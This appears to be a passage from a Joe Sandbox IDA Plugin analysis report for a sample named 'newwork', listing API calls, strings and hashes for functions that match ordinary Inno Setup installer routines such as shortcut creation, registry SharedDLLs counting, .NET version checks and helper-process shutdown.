                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
                                                                                • String ID:
                                                                                • API String ID: 269503290-0
                                                                                • Opcode ID: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                • Instruction ID: 91afdf38925dfcc0a19aef53af63d8b93a06df8cfedaf367688fa0d34ebdb442
                                                                                • Opcode Fuzzy Hash: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                • Instruction Fuzzy Hash: 01610071A44648AFDF10EBE9DC86FDFB7B8EB48704F10446AB504E7281D67CA940CB68
                                                                                APIs
                                                                                • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,004569E3), ref: 0045667E
                                                                                • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,004569E3), ref: 004566A4
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0045685B
                                                                                Strings
                                                                                • %ProgramFiles(x86)%\, xrefs: 0045672E
                                                                                • IPropertyStore::Commit, xrefs: 004568E3
                                                                                • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456840
                                                                                • IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption), xrefs: 004568CA
                                                                                • {pf32}\, xrefs: 0045671E
                                                                                • CoCreateInstance, xrefs: 004566AF
                                                                                • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004567F1
                                                                                • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 00456904
                                                                                • IPersistFile::Save, xrefs: 00456962
                                                                                • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004567BD
                                                                                • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456892
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CreateInstance$FreeString
                                                                                • String ID: %ProgramFiles(x86)%\$CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)${pf32}\
                                                                                • API String ID: 308859552-2363233914
                                                                                • Opcode ID: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                • Instruction ID: 2d3acbfbfe5134b3b68b6dcde43dfe431d970b0eaffbfac770a5f5266a6492d0
                                                                                • Opcode Fuzzy Hash: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                • Instruction Fuzzy Hash: 39B13170A00104AFDB50DFA9C845B9E7BF8AF09706F5540AAF804E7362DB78DD48CB69
                                                                                APIs
                                                                                • ShowWindow.USER32(?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000,00498B29,?,00000000), ref: 00498453
                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000), ref: 00498466
                                                                                • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000), ref: 00498476
                                                                                • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498497
                                                                                • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000), ref: 004984A7
                                                                                  • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                • API String ID: 2000705611-3672972446
                                                                                • Opcode ID: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                • Instruction ID: 1a66146e65e487955493167600903b91e60bc3637ed1504a34615a6495e02ea1
                                                                                • Opcode Fuzzy Hash: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                • Instruction Fuzzy Hash: 5191A434A042049FDF11EBA9DC52BAE7BE5EF4A304F5144BBF500AB692DE7C9C05CA19
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,0045A994), ref: 0045A846
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                • API String ID: 1452528299-3112430753
                                                                                • Opcode ID: 897371adc22cb023c4f91e5d84e86364b249416017dada323b4764b4a4f9f98f
                                                                                • Instruction ID: 43962401d403c06de7b31dde6fd87328655f81364e16ca473e433d379c6e1912
                                                                                • Opcode Fuzzy Hash: 897371adc22cb023c4f91e5d84e86364b249416017dada323b4764b4a4f9f98f
                                                                                • Instruction Fuzzy Hash: EC719070B002545BCB00EB6998417AE77A49F4931AF91896BFC01AB383DB7C9E1DC75E
                                                                                APIs
                                                                                • GetVersion.KERNEL32 ref: 0045CBDA
                                                                                • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CBFA
                                                                                • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CC07
                                                                                • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CC14
                                                                                • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CC22
                                                                                  • Part of subcall function 0045CAC8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CB67,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CB41
                                                                                • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCDB
                                                                                • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCE4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                • API String ID: 59345061-4263478283
                                                                                • Opcode ID: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                • Instruction ID: 99773ef8a3d0261052733c4904a47669a242c0659fe16ead1f438c4abb71ff4e
                                                                                • Opcode Fuzzy Hash: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                • Instruction Fuzzy Hash: BD518471900308EFDB10DF99C881BEEBBB8EB48711F14806AF904E7241C678A945CFA9
                                                                                APIs
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0041B3C3
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0041B3CD
                                                                                • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3DF
                                                                                • CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B3F6
                                                                                • GetDC.USER32(00000000), ref: 0041B402
                                                                                • CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B42F
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041B455
                                                                                • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                • String ID:
                                                                                • API String ID: 644427674-0
                                                                                • Opcode ID: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                • Instruction ID: 0f3e5998203d07172116f12fa3fedaa120d09cd030f2870c51d139f455c41937
                                                                                • Opcode Fuzzy Hash: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                • Instruction Fuzzy Hash: E941AD71E44619AFDB10DAE9C846FEFB7BCEB08704F104466B614F7281D6786D408BA8
                                                                                APIs
                                                                                  • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472D00
                                                                                • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472E07
                                                                                • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472E1D
                                                                                • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472E42
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                • API String ID: 971782779-3668018701
                                                                                • Opcode ID: ec03a6b44b0f4cd57b1805575295038081ef414545ebdff26f55f13b118b0783
                                                                                • Instruction ID: 7edda302242157afef40b0e7c7e05039b068dedd9e36cd510e855ba872eb221a
                                                                                • Opcode Fuzzy Hash: ec03a6b44b0f4cd57b1805575295038081ef414545ebdff26f55f13b118b0783
                                                                                • Instruction Fuzzy Hash: D0D14574A001489FDB11EFA9D981BDDBBF4AF08304F50816AF904B7392C778AE45CB69
                                                                                APIs
                                                                                  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000,00454B0D,?,?,00000003,00000000,00000000,00454B44), ref: 0045498D
                                                                                  • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,?,00000000,00000000,?,00000000,?,00000000), ref: 00454A11
                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,?,00000000,00000000,?,00000000,?,00000000), ref: 00454A40
                                                                                Strings
                                                                                • RegOpenKeyEx, xrefs: 00454910
                                                                                • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548AB
                                                                                • , xrefs: 004548FE
                                                                                • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548E4
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValue$FormatMessageOpen
                                                                                • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                • API String ID: 2812809588-1577016196
                                                                                • Opcode ID: aec1327b0b0803e0d56dc0c3992fac0afe6f111b5b563ab43accc1af076cf8f5
                                                                                • Instruction ID: 3b35aed17da8244e85d272d2923899a44a2159637523a8fd9e70e85f8d21f96a
                                                                                • Opcode Fuzzy Hash: aec1327b0b0803e0d56dc0c3992fac0afe6f111b5b563ab43accc1af076cf8f5
                                                                                • Instruction Fuzzy Hash: 23914871E44148ABDB10DF95C842BDEB7FCEB49309F50406BF900FB282D6789E458B69
                                                                                APIs
                                                                                  • Part of subcall function 00459364: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004594FF
                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 00459569
                                                                                  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004595D0
                                                                                Strings
                                                                                • .NET Framework not found, xrefs: 0045961D
                                                                                • v1.1.4322, xrefs: 004595C2
                                                                                • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045951C
                                                                                • v4.0.30319, xrefs: 004594F1
                                                                                • v2.0.50727, xrefs: 0045955B
                                                                                • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00459583
                                                                                • .NET Framework version %s not found, xrefs: 00459609
                                                                                • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004594B2
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Close$Open
                                                                                • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                • API String ID: 2976201327-446240816
                                                                                • Opcode ID: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                • Instruction ID: e7879d346446e6db82ad1067b50e8ffdd52b59a139ce3e0e88c8f748029a0227
                                                                                • Opcode Fuzzy Hash: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                • Instruction Fuzzy Hash: EB51A331A04148EBCB01DFA8C8A1BEE77A5DB59305F54447BA801DB353EA3D9E1ECB19
                                                                                APIs
                                                                                • CloseHandle.KERNEL32(?), ref: 00458A7B
                                                                                • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458A97
                                                                                • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458AA5
                                                                                • GetExitCodeProcess.KERNEL32(?), ref: 00458AB6
                                                                                • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458AFD
                                                                                • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458B19
                                                                                Strings
                                                                                • Helper process exited, but failed to get exit code., xrefs: 00458AEF
                                                                                • Stopping 64-bit helper process. (PID: %u), xrefs: 00458A6D
                                                                                • Helper process exited., xrefs: 00458AC5
                                                                                • Helper process exited with failure code: 0x%x, xrefs: 00458AE3
                                                                                • Helper isn't responding; killing it., xrefs: 00458A87
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                • API String ID: 3355656108-1243109208
                                                                                • Opcode ID: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                                                • Instruction ID: 3f2324d87e707cedf1d5c4e10b6e93e7b0b52df74c864805f1ac214018e434b5
                                                                                • Opcode Fuzzy Hash: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                                                • Instruction Fuzzy Hash: 2F2130706087409AD720E779C44575BB6D49F08345F04CC2FF99AEB283DF78E8488B2A
                                                                                APIs
                                                                                  • Part of subcall function 0042DDE4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045464F
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045478B
                                                                                  • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                Strings
                                                                                • RegCreateKeyEx, xrefs: 004545C3
                                                                                • , xrefs: 004545B1
                                                                                • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454567
                                                                                • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454597
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateFormatMessageQueryValue
                                                                                • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                • API String ID: 2481121983-1280779767
                                                                                • Opcode ID: f9c0919aa15cd1947ef757741bec092e2a41be70418b738709af356a648b502b
                                                                                • Instruction ID: 93c55a0ab54dbcba353dd8d7ef9dbdddde8d62e860aeeeeaccb8ee2ace91ec52
                                                                                • Opcode Fuzzy Hash: f9c0919aa15cd1947ef757741bec092e2a41be70418b738709af356a648b502b
                                                                                • Instruction Fuzzy Hash: 49810F75A00209AFDB00DFD5C981BDEB7B8EB49309F10452AF900FB282D7789E45CB69
                                                                                APIs
                                                                                  • Part of subcall function 004538BC: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                  • Part of subcall function 004538BC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00496CCD
                                                                                • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00496E21), ref: 00496CEE
                                                                                • CreateWindowExA.USER32(00000000,STATIC,00496E30,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496D15
                                                                                • SetWindowLongA.USER32(?,000000FC,004964A8), ref: 00496D28
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC,00496E30), ref: 00496D58
                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00496DCC
                                                                                • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000), ref: 00496DD8
                                                                                  • Part of subcall function 00453D30: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                • DestroyWindow.USER32(?,00496DFB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC), ref: 00496DEE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                • API String ID: 1549857992-2312673372
                                                                                • Opcode ID: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                • Instruction ID: 18f462a79ff6f3765b6ab1b49dcd34ad23a8ddcce266b6658739bc0f5698dca4
